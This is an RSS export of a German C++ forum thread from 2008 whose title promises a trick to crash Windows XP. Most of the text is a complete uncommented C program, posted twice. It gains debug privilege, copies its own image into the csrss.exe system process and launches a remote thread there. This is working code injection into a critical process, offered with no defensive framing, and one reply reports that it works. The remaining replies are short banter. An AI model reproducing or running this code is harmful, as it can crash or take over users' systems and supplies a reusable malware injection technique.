<![CDATA[roflers Trickkiste, heute: windows xp crashen]]>#include <windows.h> typedef BOOL (WINAPI *tEnumProcesses)(DWORD*,DWORD,DWORD*); typedef BOOL (WINAPI *tEnumProcessModules)(HANDLE,HMODULE*,DWORD,LPDWORD); typedef DWORD (WINAPI *tGetModuleBaseNameA)(HANDLE,HMODULE,LPSTR,DWORD); typedef int (WINAPI *tMessageBoxA)(HWND,const char*,const char*,UINT); #define CHADDR(type,x) ((##type)((DWORD)(x) + (DWORD)(hmem) - (DWORD)(hinst))) tEnumProcesses EnumProcesses; tEnumProcessModules EnumProcessModules; tGetModuleBaseNameA GetModuleBaseName; typedef struct { tMessageBoxA pMessageBox; char *txt; } ADDRS; void HideNT(); DWORD WINAPI Hack(ADDRS*); ADDRS addrs; char txt[] = "BSOD"; char s[1024]; void main(void) { HMODULE psapi = LoadLibrary("psapi.dll"); EnumProcesses = (tEnumProcesses)GetProcAddress(psapi,"EnumProcesses"); EnumProcessModules = (tEnumProcessModules)GetProcAddress(psapi,"EnumProcessModules"); GetModuleBaseName = (tGetModuleBaseNameA)GetProcAddress(psapi,"GetModuleBaseNameA"); if(!EnumProcesses || !EnumProcessModules || !GetModuleBaseName) return; HideNT(); Sleep(100); ExitProcess(0); } void HideNT() { HANDLE hToken; TOKEN_PRIVILEGES tkp; memset(&tkp,0,sizeof(tkp)); OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); LookupPrivilegeValue(0,SE_DEBUG_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, 0, 0); HMODULE hinst = GetModuleHandle(0); IMAGE_NT_HEADERS32 *pe = (IMAGE_NT_HEADERS32*)(((IMAGE_DOS_HEADER*)hinst)->e_lfanew + (DWORD)hinst); DWORD size = pe->OptionalHeader.SizeOfImage; DWORD wb; DWORD n; DWORD pr[1024]; if(!EnumProcesses(pr,sizeof(pr),&n)) return; n >>= 2; DWORD cpid = GetCurrentProcessId(); for(int i = 0; i < n; i++) { if(pr[i] == cpid) continue; HANDLE h = OpenProcess(PROCESS_ALL_ACCESS,0,pr[i]); if(!h) continue; HMODULE mod; DWORD nmod; EnumProcessModules(h,&mod,4,&nmod); GetModuleBaseName(h,mod,s,1023); if(lstrcmpi(s,"csrss.exe")) { CloseHandle(h); continue; } LPVOID hmem = VirtualAllocEx(h,0,size,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE); if(!hmem) { CloseHandle(h); continue; } addrs.txt = CHADDR(char*,txt); addrs.pMessageBox = MessageBoxA; if(!WriteProcessMemory(h,hmem,(LPVOID)hinst,size,&wb)) { VirtualFreeEx(h,hmem,size,MEM_DECOMMIT|MEM_RELEASE); CloseHandle(h); continue; } DWORD tid; if(!CreateRemoteThread(h,0,0, (LPTHREAD_START_ROUTINE)((DWORD)Hack + (DWORD)hmem - (DWORD)hinst), (LPVOID)((LPVOID)((DWORD)&addrs - (DWORD)hinst + (DWORD)hmem)),0,&tid)) { VirtualFreeEx(h,hmem,size,MEM_DECOMMIT|MEM_RELEASE); CloseHandle(h); } } } DWORD WINAPI Hack(ADDRS *a) { return a->pMessageBox(0,a->txt,a->txt,0); } ]]>https://www.c-plusplus.net/forum/topic/211245/roflers-trickkiste-heute-windows-xp-crashenRSS for NodeTue, 21 Apr 2026 15:25:08 GMTSun, 20 Apr 2008 22:08:04 GMT60<![CDATA[Reply to roflers Trickkiste, heute: windows xp crashen on Sun, 20 Apr 2008 22:08:04 GMT]]>#include <windows.h> typedef BOOL (WINAPI *tEnumProcesses)(DWORD*,DWORD,DWORD*); typedef BOOL (WINAPI *tEnumProcessModules)(HANDLE,HMODULE*,DWORD,LPDWORD); typedef DWORD (WINAPI *tGetModuleBaseNameA)(HANDLE,HMODULE,LPSTR,DWORD); typedef int (WINAPI *tMessageBoxA)(HWND,const char*,const char*,UINT); #define CHADDR(type,x) ((##type)((DWORD)(x) + (DWORD)(hmem) - (DWORD)(hinst))) tEnumProcesses EnumProcesses; tEnumProcessModules EnumProcessModules; tGetModuleBaseNameA GetModuleBaseName; typedef struct { tMessageBoxA pMessageBox; char *txt; } ADDRS; void HideNT(); DWORD WINAPI Hack(ADDRS*); ADDRS addrs; char txt[] = "BSOD"; char s[1024]; void main(void) { HMODULE psapi = LoadLibrary("psapi.dll"); EnumProcesses = (tEnumProcesses)GetProcAddress(psapi,"EnumProcesses"); EnumProcessModules = (tEnumProcessModules)GetProcAddress(psapi,"EnumProcessModules"); GetModuleBaseName = (tGetModuleBaseNameA)GetProcAddress(psapi,"GetModuleBaseNameA"); if(!EnumProcesses || !EnumProcessModules || !GetModuleBaseName) return; HideNT(); Sleep(100); ExitProcess(0); } void HideNT() { HANDLE hToken; TOKEN_PRIVILEGES tkp; memset(&tkp,0,sizeof(tkp)); OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); LookupPrivilegeValue(0,SE_DEBUG_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, 0, 0); HMODULE hinst = GetModuleHandle(0); IMAGE_NT_HEADERS32 *pe = (IMAGE_NT_HEADERS32*)(((IMAGE_DOS_HEADER*)hinst)->e_lfanew + (DWORD)hinst); DWORD size = pe->OptionalHeader.SizeOfImage; DWORD wb; DWORD n; DWORD pr[1024]; if(!EnumProcesses(pr,sizeof(pr),&n)) return; n >>= 2; DWORD cpid = GetCurrentProcessId(); for(int i = 0; i < n; i++) { if(pr[i] == cpid) continue; HANDLE h = OpenProcess(PROCESS_ALL_ACCESS,0,pr[i]); if(!h) continue; HMODULE mod; DWORD nmod; EnumProcessModules(h,&mod,4,&nmod); GetModuleBaseName(h,mod,s,1023); if(lstrcmpi(s,"csrss.exe")) { CloseHandle(h); continue; } LPVOID hmem = VirtualAllocEx(h,0,size,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE); if(!hmem) { CloseHandle(h); continue; } addrs.txt = CHADDR(char*,txt); addrs.pMessageBox = MessageBoxA; if(!WriteProcessMemory(h,hmem,(LPVOID)hinst,size,&wb)) { VirtualFreeEx(h,hmem,size,MEM_DECOMMIT|MEM_RELEASE); CloseHandle(h); continue; } DWORD tid; if(!CreateRemoteThread(h,0,0, (LPTHREAD_START_ROUTINE)((DWORD)Hack + (DWORD)hmem - (DWORD)hinst), (LPVOID)((LPVOID)((DWORD)&addrs - (DWORD)hinst + (DWORD)hmem)),0,&tid)) { VirtualFreeEx(h,hmem,size,MEM_DECOMMIT|MEM_RELEASE); CloseHandle(h); } } } DWORD WINAPI Hack(ADDRS *a) { return a->pMessageBox(0,a->txt,a->txt,0); } ]]>https://www.c-plusplus.net/forum/post/1495321https://www.c-plusplus.net/forum/post/1495321Sun, 20 Apr 2008 22:08:04 GMT<![CDATA[Reply to roflers Trickkiste, heute: windows xp crashen on Mon, 21 Apr 2008 10:43:55 GMT]]>Es tut mir leid, Leute ich bin so blöd! Bitte verzeiht mir meine unendliche Ignoranz!

]]>https://www.c-plusplus.net/forum/post/1495530https://www.c-plusplus.net/forum/post/1495530Mon, 21 Apr 2008 10:43:55 GMT<![CDATA[Reply to roflers Trickkiste, heute: windows xp crashen on Mon, 21 Apr 2008 10:51:15 GMT]]>rofler schrieb:

Es tut mir leid, Leute ich bin so blöd! Bitte verzeiht mir meine unendliche Ignoranz!

Bla, fake mich nicht, die Beiträge vom echten rofler (mir) zeugen von Intelligenz. Die Beiträge solcher Faker wie du hingegen zeugen höchstens von intellektueller Armut, also lass es Merker 👎

]]>https://www.c-plusplus.net/forum/post/1495540https://www.c-plusplus.net/forum/post/1495540Mon, 21 Apr 2008 10:51:15 GMT<![CDATA[Reply to roflers Trickkiste, heute: windows xp crashen on Mon, 21 Apr 2008 11:05:02 GMT]]>registrieren soll helfen 🙄

]]>https://www.c-plusplus.net/forum/post/1495552https://www.c-plusplus.net/forum/post/1495552Mon, 21 Apr 2008 11:05:02 GMT<![CDATA[Reply to roflers Trickkiste, heute: windows xp crashen on Mon, 21 Apr 2008 11:15:22 GMT]]>Klappt einmannfrei! Vielen Dank rofler.

]]>https://www.c-plusplus.net/forum/post/1495558https://www.c-plusplus.net/forum/post/1495558Mon, 21 Apr 2008 11:15:22 GMT<![CDATA[Reply to roflers Trickkiste, heute: windows xp crashen on Mon, 21 Apr 2008 11:16:02 GMT]]>Hmm, ein Codeschnipsel ohne Kommentare, ohne Frage, dann Kommentare ohne Bezug- 😕
Irgendwie kommt mir das alles hier nur wie Trollfutter vor. 👎

]]>https://www.c-plusplus.net/forum/post/1495559https://www.c-plusplus.net/forum/post/1495559Mon, 21 Apr 2008 11:16:02 GMT